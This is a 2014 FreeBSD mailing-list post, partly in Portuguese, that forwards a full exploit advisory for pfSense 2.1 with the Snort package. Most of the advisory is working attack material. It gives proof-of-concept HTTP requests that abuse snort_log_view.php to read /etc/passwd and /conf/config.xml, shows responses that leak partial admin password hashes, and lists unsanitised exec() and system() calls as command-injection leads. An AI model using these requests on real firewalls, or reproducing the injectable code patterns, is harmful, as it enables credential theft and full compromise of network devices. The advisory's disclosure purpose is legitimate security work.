[FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)

firebits mrpa.security em gmail.com
Terça Janeiro 28 18:08:50 BRST 2014 

Show! (na visão de pesquisa em vulnerabilidades)

@firebitsbr


2014-01-28 Welkson Renny de Medeiros <welkson em gmail.com>

> Senhores, boa tarde!
>
> Alerta pra quem usa o package Snort no pfSense.
>
> Welkson
>
> ...
>
> ######################################################################
> #  _     ___  _   _  ____  ____    _  _____
> #  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
> #  | |  | | | |  \| | |  _| |     / _ \ | |
> #  | |__| |_| | |\  | |_| | |___ / ___ \| |
> #  |_____\___/|_| \_|\____|\____/_/   \_\_|
> #
> # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
> users (LFI/RCE)
> # Date: 25/01/2014 (0-day)
> # Exploit Author: @u0x (Pichaya Morimoto)
> # Software Link: www.pfsense.org
> # Category: Local File Inclusion (LFI) & Privilege Escalation
> # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
> #
> #####################################################################
>
>
>
> pfSense firewall/router distribution description :
>
> ======================================================================
>
> pfSense is a free, open source customized distribution of FreeBSD tailored
> for use as a firewall and router. In addition to being a powerful, flexible
> firewalling and routing platform, it includes a long list of related
> features and a package system allowing further expandability without adding
> bloat and potential security vulnerabilities to the base distribution.
> pfSense is a popular project with more than 1 million downloads since its
> inception, and proven in countless installations ranging from small home
> networks protecting a PC and an Xbox to large corporations, universities
> and other organizations protecting thousands of network devices.
>
> This project started in 2004 as a fork of the m0n0wall project, but focused
> towards full PC installations rather than the embedded hardware focus of
> m0n0wall. pfSense also offers an embedded image for Compact Flash based
> installations, however it is not our primary focus.
>
> Attack Scenario
>
> ======================================================================
>
> Authenticated users with only permission to access some packages in web gui
> (a.k.a. webConfigurator) will be able to escalate themselves to other
> privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
> LFI), result in fully compromise the pfSense.
>
> This attack abuse the user privilege scheme with some of official packages
> (System > Package Manager)
>
> * Session Hijacking also possible to steal less privileged user sessions to
> perform this trick  due to "http" admin by default webConfigurator.
>
> Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
> Vulnerability
>
> Vulnerable file:
>
> ======================================================================
>
> snort_log_view.php
>
> [+] Checksum
> SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
> MD5: cd767e46a4e9e09ede7fd26560e37f14
>
> Vulnerable Source Code :
> ======================================================================
> http://www.pfsense.com/packages/config/snort/snort_log_view.php
>
> https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php
>
> ...(deducted)...
>
> $contents = '';
> // Read the contents of the argument passed to us.
> // Is it a fully qualified path and file?
>
> if (file_exists($_GET['logfile']))
>        $contents = file_get_contents($_GET['logfile']);
> // It is not something we can display, so print an error.
> else
>        $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not
> found!");
> $pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
> ?>
>
> ...(deducted)...
> <textarea style="width:100%; height:100%;" readonly wrap="off" rows="33"
> cols="80" name="code2"><?=$contents;?></textarea>
> ...(deducted)...
>
>
>
> Proof of Concept 1 : Arbitrary File Inclusion
> ======================================================================
>
> GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
> Host: firewall1.pentestlab1:1337
> Connection: keep-alive
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: th,en-US;q=0.8,en;q=0.6
> Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
>
> HTTP/1.1 200 OK
> Expires: Mon, 27 Jan 2014 07:25:10 GMT
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control: max-age=180000
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
> X-Frame-Options: SAMEORIGIN
> Pragma: no-cache
> Content-type: text/html
> Transfer-Encoding: chunked
> Date: Sat, 25 Jan 2014 05:25:10 GMT
> Server: lighttpd/1.4.32
>
> ...(deducted)...
> <td colspan="2" valign="top" class="label">
>            <div style="background: #eeeeee; width:100%; height:100%;"
> id="textareaitem"><!-- NOTE: The opening *and* the closing textarea tag
> must be on the same line. -->
>            <textarea style="width:100%; height:100%;" readonly wrap="off"
> rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh
> toor:*:0:0:Bourne-again Superuser:/root:
> daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> operator:*:2:5:System &:/:/usr/sbin/nologin
> ...(deducted)...
> havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
> squid:*:100:100:squid caching-proxy pseudo
> user:/var/squid:/usr/sbin/nologin
> c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
> snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
> ...(deducted)...
>
> Proof of Concept 2 : Directory Traversal
> # This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) +
> Lighttpd/1.4.32 on FreeBSD 8.3 x64
> ======================================================================
>
> GET /snort/snort_log_view.php?logfile=../ HTTP/1.1
> Host: firewall1.pentestlab1:1337
> Connection: keep-alive
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: th,en-US;q=0.8,en;q=0.6
> Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
>
> ...(deducted)...
> ¬p.Z..-p firewall_rules_edit.php(R)p
> xmlrpc.php¯p
> wizard.php°p
>
> vpn_pptp_users_edit.php±pvpn_pptp_users.php²pvpn_pptp.php³pvpn_pppoe_edit.php´p
> vpn_pppoe.phpµp vpn_openvpn_server.php¶pvpn_openvpn_csc.php·p
> vpn_openvpn_client.php¸p
> vpn_l2tp_users_edit.php¹pvpn_l2tp_users.phpºpvpn_l2tp.php>>p
> vpn_ipsec_phase2.php 1/4 p vpn_ipsec_phase1.php 1/2 p(vpn_ipsec_mobile.php
> 3/4 p
> vpn_ipsec_keys_edit.php¿pvpn_ipsec_keys.phpÀp
> vpn_ipsec.phpÁpuploadconfig.phpÂptreeview.cssÃpwizardsÏp
>
> tree-imagesÛp0$system_usermanager_settings_test.phpÜp8,system_usermanager_settings_ldapacpicker.phpÿÿÿÝp(system_usermanager_settings.phpÞp,!
> ...(deducted)...
>
> Proof of Concept 3 : Privilege Escalation
> # -rw-r--r--  root wheel 30k Jan 25 11:35 config.xml
> ======================================================================
>
> GET /snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1
> Host: firewall1.pentestlab1:1337
> Connection: keep-alive
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: th,en-US;q=0.8,en;q=0.6
> Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
>
> ...(deducted)...
> <group>
>            <name>office</name>
>            <description><![CDATA[Main Office Employees]]></description>
>            <member>2000</member>
>            <gid>2000</gid>
>        </group>
>        <user>
>            <name>admin</name>
>            <descr><![CDATA[System Administrator]]></descr>
>            <scope>system</scope>
>            <groupname>admins</groupname>
>            <password>$1$y8KiO3ow$mmMX4R0hE...(deducted)...</password>
>            <uid>0</uid>
>            <priv>user-shell-access</priv>
>            <md5-hash>d4383b6f4c9fa...(deducted)...</md5-hash>
> <nt-hash>356239666432306265376131653...(deducted)...</nt-hash>
>        </user>
> ...(deducted)...
>
> P.S. There are many other ways to escalate from less-privileged users using
> official packages.
> For example, some OS command injections (Feel free to dig deeper than me..
> LoL)
>
> arping/arping.inc:38:   system("arping -c3 " . $_POST['hostip']);
> tinc/tinc.inc:173:                                mwexec("/sbin/ifconfig
> {$realif} -group " . $a_ifgroups[$_GET['id']]['ifname']);
> spamd/spamd_db_ext.php:57:exec("echo {$_GET['action']} > /tmp/tmp");
> spamd/spamd_db.php:106: $status = exec("/usr/local/sbin/spamdb | grep
> \"{$_GET['getstatus']}\"");
> freeswitch_dev/v_profiles.tmp:38:       exec("cp
> ".$v_conf_dir.".orig/sip_profiles/".$_GET['f']."
> ".$v_conf_dir."/sip_profiles/".$_GET['f']);
> freeswitch_dev/v_profiles.tmp:60:                       exec("rm
> ".$v_conf_dir."/sip_profiles/".$_GET['f']);
> snort-dev/snortsam-package-code/snort_new.inc:112:
> exec("/bin/ln -s
> /usr/local/etc/snort/snortDBrules/DB/{$_POST['ruledbname']}/rules
> {$pathToSnortDir}/{$newSnortDir}/rules");
> snort-dev/snortsam-package-code/snort_new.inc:129:
> $sidLinePosPre = exec('/usr/bin/sed -n /sid:' . $_POST['snortSidNum'] .
> '\;/= ' . $workingFile);
>
> # Special Thanks : Xelenonz, pistachio, pe3z and 2600 Thailand.
> # Video PoC (Thai version) : https://www.youtube.com/watch?v=dGwOUccGZnE
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>

Mais detalhes sobre a lista de discussão freebsd